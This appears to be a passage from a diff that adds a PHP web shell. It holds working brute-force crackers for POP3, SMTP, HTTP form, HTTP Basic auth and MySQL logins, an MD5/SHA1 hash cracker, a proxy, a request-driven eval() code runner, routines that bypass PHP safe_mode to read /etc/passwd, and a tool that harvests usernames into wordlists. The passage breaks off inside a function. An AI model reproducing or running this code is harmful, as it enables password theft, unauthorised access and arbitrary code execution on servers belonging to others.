+}else echo "<center>${t}SNMP cracker:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\">$hcwd<tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right><input class=buttons type=submit value=Start></td></tr></form></table></center>";
+}
+function pop3crackeR(){
+global $t,$et,$errorbox,$crack;
+if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
+$target=$_REQUEST['target'];
+$type=$_REQUEST['combo'];
+$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
+$dictionary=fopen($_REQUEST['dictionary'],'r');
+if ($dictionary){
+echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";flusheR();
+while(!feof($dictionary)){
+if($type){
+$combo=trim(fgets($dictionary)," \n\r");
+$user=substr($combo,0,strpos($combo,':'));
+$pass=substr($combo,strpos($combo,':')+1);
+}else{
+$pass=trim(fgets($dictionary)," \n\r");
+}
+$pop3=pop3logiN($target,$user,$pass);
+if($pop3==-1){echo "$errorbox Can not connect to server.$et";break;} else{
+if ($pop3){echo "U: $user P: $pass<br>";if(!$type)break;}}
+flusheR();
+}
+echo "<br>Done</font>";
+fclose($dictionary);
+}
+else{
+echo "$errorbox Can not open dictionary.$et";
+}
+}else echo "<center>${t}POP3 cracker:$crack";
+}
+function smtpcrackeR(){
+global $t,$et,$errorbox,$crack;
+if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
+$target=$_REQUEST['target'];
+$type=$_REQUEST['combo'];
+$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
+$dictionary=fopen($_REQUEST['dictionary'],'r');
+if ($dictionary){
+echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";flusheR();
+while(!feof($dictionary)){
+if($type){
+$combo=trim(fgets($dictionary)," \n\r");
+$user=substr($combo,0,strpos($combo,':'));
+$pass=substr($combo,strpos($combo,':')+1);
+}else{
+$pass=trim(fgets($dictionary)," \n\r");
+}
+$smtp=smtplogiN($target,$user,$pass,5);
+if($smtp==-1){echo "$errorbox Can not connect to server.$et";break;} else{
+if ($smtp){echo "U: $user P: $pass<br>";if(!$type)break;}}
+flusheR();
+}
+echo "<br>Done</font>";
+fclose($dictionary);
+}
+else{
+echo "$errorbox Can not open dictionary.$et";
+}
+}else echo "<center>${t}SMTP cracker:$crack";
+}
+function formcrackeR(){
+global $errorbox,$footer,$et,$hcwd;
+if(!empty($_REQUEST['start'])){
+$url=$_REQUEST['target'];
+$uf=$_REQUEST['userf'];
+$pf=$_REQUEST['passf'];
+$sf=$_REQUEST['submitf'];
+$sv=$_REQUEST['submitv'];
+$method=$_REQUEST['method'];
+$fail=$_REQUEST['fail'];
+$dic=$_REQUEST['dictionary'];
+$type=$_REQUEST['combo'];
+$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
+if(!file_exists($dic)) die("$errorbox Can not open dictionary.$et$footer");
+$dictionary=fopen($dic,'r');
+echo "<font color=blue>Cracking started...<br>";
+while(!feof($dictionary)){
+if($type){
+$combo=trim(fgets($dictionary)," \n\r");
+$user=substr($combo,0,strpos($combo,':'));
+$pass=substr($combo,strpos($combo,':')+1);
+}else{
+$pass=trim(fgets($dictionary)," \n\r");
+}
+$url.="?$uf=$user&$pf=$pass&$sf=$sv";
+$res=check_urL($url,$method,$fail,12);
+if (!$res){echo "<font color=blue>U: $user P: $pass</font><br>";flusheR();if(!$type)break;}
+flusheR();
+}
+fclose($dictionary);
+echo "Done!</font><br>";
+}
+else echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"434\"><tr><td width=\"174\" bgcolor=\"#333333\">HTTP Form cracker:</td><td bgcolor=\"#333333\" width=\"253\"></td></tr><form method=\"POST\" name=form><tr><td width=\"174\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user>$hcwd</td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Action Page:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=target value=\"http://".getenv('HTTP_HOST')."/login.php\" size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Method:</td><td bgcolor=\"#666666\" width=\"253\"><select size=\"1\" name=\"method\"><option selected value=\"POST\">POST</option><option value=\"GET\">GET</option></select></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Username field name:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=userf value=user size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Password field name:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text name=passf value=passwd size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Submit name:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text value=login name=submitf size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Submit value:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text value=\"Login\" name=submitv size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Fail string:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=fail value=\"Try again\" size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right width=\"253\"><input class=buttons type=submit name=start value=Start></td></tr></form></table></center>";
+}
+function hashcrackeR(){
+global $errorbox,$t,$et,$hcwd;
+if (!empty($_REQUEST['hash']) && !empty($_REQUEST['dictionary']) && !empty($_REQUEST['type'])){
+$dictionary=fopen($_REQUEST['dictionary'],'r');
+if ($dictionary){
+$hash=strtoupper($_REQUEST['hash']);
+echo "<font color=blue>Cracking " . htmlspecialchars($hash)."...<br>";flusheR();
+$type=($_REQUEST['type']=='MD5')?'md5':'sha1';
+while(!feof($dictionary)){
+$word=trim(fgets($dictionary)," \n\r");
+if ($hash==strtoupper(($type($word)))){echo "The answer is $word<br>";break;}
+}
+echo "Done!</font>";
+fclose($dictionary);
+}
+else{
+echo "$errorbox Can not open dictionary.$et";
+}
+}
+echo "<center>${t}Hash cracker:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Hash:</td><td bgcolor=\"#808080\"><input type=text name=hash size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Type:</td><td bgcolor=\"#666666\"><select name=type><option selected value=MD5>MD5</option><option value=SHA1>SHA1</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Start></td></tr></form></table></center>";
+}
+function pr0xy(){
+global $errorbox,$et,$footer,$hcwd;
+echo "<table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\"><form method=\"POST\"><tr><td width=\"20%\"><b>Navigator: </b><input type=text name=urL size=140 value=\""; if(!!empty($_REQUEST['urL'])) echo "http://www.edpsciences.org/htbin/ipaddress"; else echo htmlspecialchars($_REQUEST['urL']);echo "\">$hcwd<input type=submit class=buttons value=Go></td></tr></form></table>";
+if (!empty($_REQUEST['urL'])){
+$dir="";
+$u=parse_url($_REQUEST['urL']);
+$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';
+if(substr_count($file,'/')>1)$dir=substr($file,0,(strpos($file,'/')));
+$url=@fsockopen($host, 80, $errno, $errstr, 12);
+if(!$url)die("<br>$errorbox Can not connect to host!$et$footer");
+fputs($url, "GET /$file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n");
+while(!feof($url)){
+$con = fgets($url);
+$con = str_replace("href=mailto","HrEf=mailto",$con);
+$con = str_replace("HREF=mailto","HrEf=mailto",$con);
+$con = str_replace("href=\"mailto","HrEf=\"mailto",$con);
+$con = str_replace("HREF=\"mailto","HrEf=\"mailto",$con);
+$con = str_replace("href=\'mailto","HrEf=\"mailto",$con);
+$con = str_replace("HREF=\'mailto","HrEf=\"mailto",$con);
+$con = str_replace("href=\"http","HrEf=\"".hlinK("seC=px&urL=http"),$con);
+$con = str_replace("HREF=\"http","HrEf=\"".hlinK("seC=px&urL=http"),$con);
+$con = str_replace("href=\'http","HrEf=\"".hlinK("seC=px&urL=http"),$con);
+$con = str_replace("HREF=\'http","HrEf=\"".hlinK("seC=px&urL=http"),$con);
+$con = str_replace("href=http","HrEf=".hlinK("seC=px&urL=http"),$con);
+$con = str_replace("HREF=http","HrEf=".hlinK("seC=px&urL=http"),$con);
+$con = str_replace("href=\"","HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),$con);
+$con = str_replace("HREF=\"","HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),$con);
+$con = str_replace("href=\"","HrEf=\'".hlinK("seC=px&urL=http://$host/$dir/"),$con);
+$con = str_replace("HREF=\"","HrEf=\'".hlinK("seC=px&urL=http://$host/$dir/"),$con);
+$con = str_replace("href=","HrEf=".hlinK("seC=px&urL=http://$host/$dir/"),$con);
+$con = str_replace("HREF=","HrEf=".hlinK("seC=px&urL=http://$host/$dir/"),$con);
+echo $con;
+}
+fclose($url);
+}
+}
+function mysqlclienT(){
+global $t,$errorbox,$et,$hcwd;
+if (!empty($_REQUEST['serveR']) && !empty($_REQUEST['useR']) && !empty($_REQUEST['pasS']) && !empty($_REQUEST['querY'])){
+$server=$_REQUEST['serveR'];$pass=$_REQUEST['pasS'];$user=$_REQUEST['useR'];$query=$_REQUEST['querY'];
+if(!empty($_REQUEST['dB']))$db=$_REQUEST['dB'];
+$link = @mysql_connect($server,$user,$pass);
+if($link){
+if (!empty($db))mysql_select_db($db);
+$result=mysql_query($query,$link);
+echo "${t}Query result(s):$et";
+echo "<font color=blue><pre>";
+while($data=mysql_fetch_row($result)){
+foreach($data as $v) {
+echo $v;
+echo "\t";
+}
+echo "\n";
+}
+echo "</pre></font>";
+mysql_close($link);
+}
+else{
+echo "$errorbox Login failed!$et<br>";
+}
+}
+echo "<center>${t}MySQL cilent:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Server:</td><td bgcolor=\"#666666\"><input type=text value=\"";if (!empty($_REQUEST['server'])) echo htmlspecialchars($_REQUEST['server']);else echo "localhost:3306"; echo "\" name=serveR size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Username:</td><td bgcolor=\"#808080\"><input type=text name=useR value=\"";if (!empty($_REQUEST['user'])) echo htmlspecialchars($_REQUEST['user']);else echo "root"; echo "\" size=35></td><tr><td width=\"20%\" bgcolor=\"#666666\">Password:</td><td bgcolor=\"#666666\"><input type=text value=\"";if (!empty($_REQUEST['pass'])) echo htmlspecialchars($_REQUEST['pass']);else echo "123456"; echo "\" name=pasS size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Database:</td><td bgcolor=\"#808080\"><input type=text value=\"";if (!empty($_REQUEST['db'])) echo htmlspecialchars($_REQUEST['db']); echo "\" name=dB size=35></td><tr><td width=\"20%\" bgcolor=\"#666666\">Query:</td><td bgcolor=\"#666666\"><textarea name=querY rows=5 cols=27>";if (!empty($_REQUEST['query'])) echo htmlspecialchars(($_REQUEST['query']));else echo "SHOW DATABASES"; echo "</textarea></td></tr></tr><tr><td width=\"20%\" bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=\"Submit Query\"></td></tr></form></table></center>";
+}
+function phpevaL(){
+global $t,$hcwd;
+if (!empty($_REQUEST['code'])){
+echo "<center><textarea rows=\"10\" cols=\"64\">";
+$code = str_replace("<?php","",$_REQUEST['code']);
+$code = str_replace("<?","",$code);
+$code = str_replace("?>","",$code);
+htmlspecialchars(eval($code));
+echo "</textarea></center><br>";
+}
+echo "<center>${t}Evaler:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Codes:</td><td bgcolor=\"#666666\"><textarea rows=\"10\" name=\"code\" cols=\"64\">";if(!empty($_REQUEST['code']))echo htmlspecialchars($_REQUEST['code']);echo "</textarea></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=Execute></td></tr></form></table></center>";
+}
+function whoiS(){
+global $t,$hcwd;
+if (!empty($_REQUEST['server']) && !empty($_REQUEST['domain'])){
+$server =$_REQUEST['server'];
+$domain=$_REQUEST['domain']."\r\n";
+$ser=fsockopen($server,43,$en,$es,5);
+fputs($ser,$domain);
+echo "<pre>";
+while(!feof($ser))echo fgets($ser);
+echo "</pre>";
+fclose($ser);
+}
+else{
+echo "<center>${t}Whois:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Server:</td><td bgcolor=\"#666666\"><input type=text value=\"";if (!empty($_REQUEST['server'])) echo htmlspecialchars($_REQUEST['server']);else echo "whois.geektools.com"; echo "\" name=server size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">domain:</td><td bgcolor=\"#808080\"><input type=text name=domain value=\"";if (!empty($_REQUEST['domain'])) echo htmlspecialchars($_REQUEST['domain']); else echo "google.com"; echo  "\" size=35></td><tr><td bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=\"Do\"></td></tr></form></table></center>";
+}
+}
+function hexvieW(){
+if (!empty($_REQUEST['filE'])){
+$f = $_REQUEST['filE'];
+echo "<table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"100%\"><td width=\"10%\" bgcolor=\"#282828\">Offset</td><td width=\"25%\" bgcolor=\"#282828\">Hex</td><td width=\"25%\" bgcolor=\"#282828\"></td><td width=\"40%\" bgcolor=\"#282828\">ASCII</td></tr>";
+$file = fopen($f,"r");
+$i= -1;
+while (!feof($file)) {
+$ln='';
+$i++;
+echo "<tr><td width=\"10%\" bgcolor=\"#";
+if ($i % 2==0) echo "666666";else echo "808080";
+echo "\">";echo str_repeat("0",(8-strlen($i * 16))).$i * 16;echo "</td>";
+echo "<td width=\"25%\" bgcolor=\"#";
+if ($i % 2==0) echo "666666";else echo "808080"; 
+echo "\">";
+for ($j=0;$j<=7;$j++){
+if (!feof($file)){
+$tmp = strtoupper(dechex(ord(fgetc($file))));
+if (strlen($tmp)==1) $tmp = "0".$tmp;
+echo $tmp." ";
+$ln.=$tmp;
+}
+}
+echo "</td><td width=\"25%\" bgcolor=\"#";
+if ($i % 2==0) echo "666666";else echo "808080"; 
+echo "\">";
+for ($j=7;$j<=14;$j++){
+if (!feof($file)){
+$tmp = strtoupper(dechex(ord(fgetc($file))));
+if (strlen($tmp)==1) $tmp = "0".$tmp;
+echo $tmp." ";
+$ln.=$tmp;
+}
+}
+echo "</td><td width=\"40%\" bgcolor=\"#";
+if ($i % 2==0) echo "666666";else echo "808080";
+echo "\">";
+$n=0;$asc="";$co=0;
+for ($k=0;$k<=16;$k++){
+$co=hexdec(substr($ln,$n,2));
+if (($co<=31)||(($co>=127)&&($co<=160)))$co=46;
+$asc.= chr($co);
+$n+=2;
+}
+echo htmlspecialchars($asc);
+echo "</td></tr>";
+}
+}
+fclose($file);
+echo "</table>";
+}
+function safemodE(){
+global $windows,$t,$hcwd;
+if (!empty($_REQUEST['file'])){
+$i=1;
+echo "<pre>\n<font color=green>Method $i:(ini_restore)</font><font color=blue>\n";
+ini_restore("safe_mode");ini_restore("open_basedir");
+$tmp = file_get_contents($_REQUEST['file']);
+echo $tmp;
+$i++;
+echo "\n</font><font color=green>Method $i:(copy)</font><font color=blue>\n";
+$tmp=tempnam("","cx");
+copy("compress.zlib://".$_REQUEST['file'], $tmp);
+$fh = fopen($tmp, "r");
+$data = fread($fh, filesize($tmp));
+fclose($fh);
+echo $data;
+$i++;
+if(function_exists("curl_init")){
+echo "\n</font><font color=green>Method $i:(curl_init)[A]</font><font color=blue>\n";
+$fh = @curl_init("file://".$_REQUEST['file']."");
+$tmp = @curl_exec($fh);
+echo $tmp;
+$i++;
+echo "\n</font><font color=green>Method $i:(curl_init)[B]</font><font color=blue>\n";
+$i++;
+if(strstr($_REQUEST['file'],DIRECTORY_SEPARATOR))
+$ch =curl_init("file:///".$_REQUEST['file']."\x00/../../../../../../../../../../../../".__FILE__);
+else $ch = curl_init("file://".$_REQUEST['file']."\x00".__FILE__);
+curl_exec($ch);
+var_dump(curl_exec($ch));
+}
+if($_REQUEST['file'] == "/etc/passwd"){
+echo "\n</font><font color=green>Method $i:(posix)</font><font color=blue>\n";
+for($uid=0;$uid<99999;$uid++){
+$h=posix_getpwuid($uid);
+if (!empty($h))foreach($h as $v)echo "$v:";}}
+$i++;
+echo "</pre></font>";
+}
+echo "<center>${t}Anti Safe-Mode:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">File:</td><td bgcolor=\"#666666\"><input type=text value=\"";if (!empty($_REQUEST['file'])) echo htmlspecialchars($_REQUEST['file']);elseif(!$windows) echo "/etc/passwd"; echo "\" name=file size=35></td></tr><tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=\"Read\"></td></tr></form></table></center>";
+}
+function crackeR(){
+global $et;
+$cwd = getcwd();
+echo "<center><table border=0 bgcolor=#333333><tr><td><a href=\"".hlinK("seC=hc&workingdiR=$cwd")."\">[Hash]</a> - <a href=\"".hlinK("seC=smtp&workingdiR=$cwd")."\">[SMTP]</a> - <a href=\"".hlinK("seC=pop3&workingdiR=$cwd")."\">[POP3]</a> - <a href=\"".hlinK("seC=imap&workingdiR=$cwd")."\">[IMAP]</a> - <a href=\"".hlinK("seC=ftp&workingdiR=$cwd")."\">[FTP]</a> - <a href=\"".hlinK("seC=snmp&workingdiR=$cwd")."\">[SNMP]</a> - <a href=\"".hlinK("seC=sql&workingdiR=$cwd")."\">[MySQL]</a> - <a href=\"".hlinK("seC=fcr&workingdiR=$cwd")."\">[HTTP form]</a> - <a href=\"".hlinK("seC=auth&workingdiR=$cwd")."\">[HTTP Auth(basic)]</a> - <a href=\"".hlinK("seC=dic&workingdiR=$cwd")."\">[Dictionary maker]</a>$et</center>";
+}
+function dicmakeR(){
+global $errorbox,$windows,$footer,$t,$et,$hcwd;
+if (!empty($_REQUEST['combo'])&&($_REQUEST['combo']==1)) $combo=1 ; else $combo=0;
+if (!empty($_REQUEST['range']) && !empty($_REQUEST['output']) && !empty($_REQUEST['min']) && !empty($_REQUEST['max'])){
+$min = $_REQUEST['min'];
+$max = $_REQUEST['max'];
+if($max<$min)die($errorbox ."Bad input!$et". $footer);
+$s =$w="";
+$out = $_REQUEST['output'];
+$r = ($_REQUEST['range']=='a' )?'a':'A';
+if ($_REQUEST['range']==0) $r=0;
+for($i=0;$i<$min;$i++) $s.=$r;
+$dic = fopen($out,'a');
+if(is_nan($r)){
+while(strlen($s)<=$max){
+$w = $s;
+if($combo)$w="$w:$w";
+fwrite($dic,$w."\n");
+$s++;}
+}
+else{
+while(strlen($w)<=$max){
+$w =(string)str_repeat("0",($min - strlen($s))).$s;
+if($combo)$w="$w:$w";
+fwrite($dic,$w."\n");
+$s++;}
+}
+fclose($dic);
+echo "<font color=blue>Done</font>";
+}
+if (!empty($_REQUEST['input']) && !empty($_REQUEST['output'])){
+$input=fopen($_REQUEST['input'],'r');
+if (!$input){
+if ($windows)echo $errorbox. "Unable to read from ".htmlspecialchars($_REQUEST['input']) ."$et<br>";
+else{
+$input=explode("\n",shelL("cat $input"));
+$output=fopen($_REQUEST['output'],'w');
+if ($output){
+foreach ($input as $in){
+$user = $in;
+$user = trim(fgets($in)," \n\r");
+if (!strstr($user,":"))continue;
+$user=substr($user,0,(strpos($user,':')));
+if($combo) fwrite($output,$user.":".$user."\n"); else fwrite($output,$user."\n");
+}
+fclose($input);fclose($output);
+echo "<font color=blue>Done</font>";
+}
+}
+}
+else{
+$output=fopen($_REQUEST['output'],'w');
+if ($output){
+while (!feof($input)){
+$user = trim(fgets($input)," \n\r");
+if (!strstr($user,":"))continue;
+$user=substr($user,0,(strpos($user,':')));
+if($combo) fwrite($output,$user.":".$user."\n"); else fwrite($output,$user."\n");
+}
+fclose($input);fclose($output);
+echo "<font color=blue>Done</font>";
+}
+else echo $errorbox." Unable to write data to ".htmlspecialchars($_REQUEST['input']) ."$et<br>";
+}
+}elseif (!empty($_REQUEST['url']) && !empty($_REQUEST['output'])){
+$res=downloadiT($_REQUEST['url'],$_REQUEST['output']);
+if($combo && $res){
+$file=file($_REQUEST['output']);
+$output=fopen($_REQUEST['output'],'w');
+foreach ($file as $v)fwrite($output,"$v:$v\n");
+fclose($output);
+}
+echo "<font color=blue>Done</font>";
+}else{
+$temp=whereistmP();
+echo "<center>${t}Wordlist generator:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Range:</td><td bgcolor=\"#666666\"><select name=range><option value=a>a-z</option><option value=Z>A-Z</option><option value=0>0-9</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Min lenght:</td><td bgcolor=\"#808080\"><select name=min><option value=1>1</option><option value=2>2</option><option value=3>3</option><option value=4>4</option><option value=5>5</option><option value=6>6</option><option value=7>7</option><option value=8>8</option><option value=9>9</option><option value=10>10</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Max lenght:</td><td bgcolor=\"#666666\"><select name=max><option value=2>2</option><option value=3>3</option><option value=4>4</option><option value=5>5</option><option value=6>6</option><option value=7>7</option><option value=8 selected>8</option><option value=9>9</option><option value=10>10</option><option value=11>11</option><option value=12>12</option><option value=13>13</option><option value=14>14</option><option value=15>15</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td><td bgcolor=\"#808080\"><input type=text value=\"$temp/.dic\" name=output size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox name=combo style=\"border-width:1px;background-color:#666666;\" value=1 checked>Combo style output</td></tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Make></td></tr></form></table><br>${t}Grab dictionary:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Grab from:</td><td bgcolor=\"#666666\"><input type=text value=\"/etc/passwd\" name=input size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td><td bgcolor=\"#808080\"><input type=text value=\"$temp/.dic\" name=output size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox style=\"border-width:1px;background-color:#666666;\" name=combo value=1 checked>Combo style output</td></tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Grab></td></tr></form></table><br>${t}Download dictionary:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">URL:</td><td bgcolor=\"#666666\"><input type=text value=\"http://vburton.ncsa.uiuc.edu/wordlist.txt\" name=url size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td><td bgcolor=\"#808080\"><input type=text value=\"$temp/.dic\" name=output size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox style=\"border-width:1px;background-color:#666666;\" name=combo value=1 checked>Combo style output</td></tr><tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Get></td></tr></form></table></center>";}
+}
+function calC(){
+global $t,$et,$hcwd;
+$fu = array('-','md5','sha1','crc32','hex','ip2long','long2ip','base64_encode','base64_decode','urldecode','urlencode');
+if (!empty($_REQUEST['input']) && (in_array($_REQUEST['to'],$fu))){
+echo "<center>${t}Output:<br><textarea rows=\"10\" cols=\"64\">";
+if($_REQUEST['to']!='hex')echo $_REQUEST['to']($_REQUEST['input']);else for($i=0;$i<strlen($_REQUEST['input']);$i++)echo strtoupper(dechex(ord($_REQUEST['input']{$i})));
+echo "</textarea>$et</center><br>";
+}
+echo "<center>${t}Convertor:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Input:</td><td bgcolor=\"#666666\"><textarea rows=\"10\" name=\"input\" cols=\"64\">";if(!empty($_REQUEST['input']))echo htmlspecialchars($_REQUEST['input']);echo "</textarea></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Task:</td><td bgcolor=\"#808080\"><select size=1 name=to><option value=md5>MD5</option><option value=sha1>SHA1</option><option value=crc32>crc32</option><option value=ip2long>IP to long</option><option value=long2ip>Long to IP</option><option value=hex>HEX</option><option value=urlencode>URL encoding</option><option value=urldecode>URL decoding</option><option value=base64_encode>Base64 encoding</option><option value=base64_decode>Base64 decoding</option></select></td><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right><input class=buttons type=submit value=Convert></td></tr>$hcwd</form></table></center>";
+}
+function authcrackeR(){
+global $errorbox,$et,$t,$crack,$hcwd;
+if(!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
+$data='';
+$method=($_REQUEST['method'])?'POST':'GET';
+if(strstr($_REQUEST['target'],'?')){$data=substr($_REQUEST['target'],strpos($_REQUEST['target'],'?')+1);$_REQUEST['target']=substr($_REQUEST['target'],0,strpos($_REQUEST['target'],'?'));}
+spliturL($_REQUEST['target'],$host,$page);
+$type=$_REQUEST['combo'];
+$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
+if($method='GET')$page.=$data;
+$dictionary=fopen($_REQUEST['dictionary'],'r');
+echo "<font color=blue>";
+while(!feof($dictionary)){
+if($type){
+$combo=trim(fgets($dictionary)," \n\r");
+$user=substr($combo,0,strpos($combo,':'));
+$pass=substr($combo,strpos($combo,':')+1);
+}else{
+$pass=trim(fgets($dictionary)," \n\r");
+}
+$so=fsockopen($host,80,$en,$es,5);
+if(!$so){echo "$errorbox Can not connect to host$et";break;}
+else{
+$packet="$method /$page HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nConnection: Close\r\nAuthorization: Basic ".base64_encode("$user:$pass");
+if($method=='POST')$packet.="Content-Type: application/x-www-form-urlencoded\r\nContent-Length: ".strlen($data);
+$packet.="\r\n\r\n";
+$packet.=$data;
+fputs($so,$packet);
+$res=substr(fgets($so),9,2);
+fclose($so);
+if($res=='20')echo "U: $user P: $pass</br>";
+flusheR();
+}
+}
+echo "Done!</font>";
+}else echo "<center><form method=\"POST\" name=form>${t}HTTP Auth cracker:</td><td bgcolor=\"#333333\"><select name=method><option value=1>POST</option><option value=0>GET</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target value=localhost size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=Start></td></tr></form></table></center>";
+}
+function sqlcrackeR(){
+global $errorbox,$t,$et,$crack;
+if (!function_exists("mysql_connect")){
+echo "$errorbox Server does n`t support MySQL$et";
+}
+else{
+if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
+$target=$_REQUEST['target'];
+$type=$_REQUEST['combo'];
+$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
+$dictionary=fopen($_REQUEST['dictionary'],'r');
+if ($dictionary){
+echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";
+while(!feof($dictionary)){
+if($type){
+$combo=trim(fgets($dictionary)," \n\r");
+$user=substr($combo,0,strpos($combo,':'));
+$pass=substr($combo,strpos($combo,':')+1);
+}else{
+$pass=trim(fgets($dictionary)," \n\r");
+}
+$sql=@mysql_connect($target,$user,$pass);
+if($sql){echo "U: $user P: $pass (<a href=\"".hlinK("seC=mysql&serveR=$target&useR=$user&pasS=$pass&querY=SHOW+DATABASES&workingdiR=".getcwd())."\">Connect</a>)<br>";mysql_close($sql);if(!$type)break;}
+flusheR();
+}
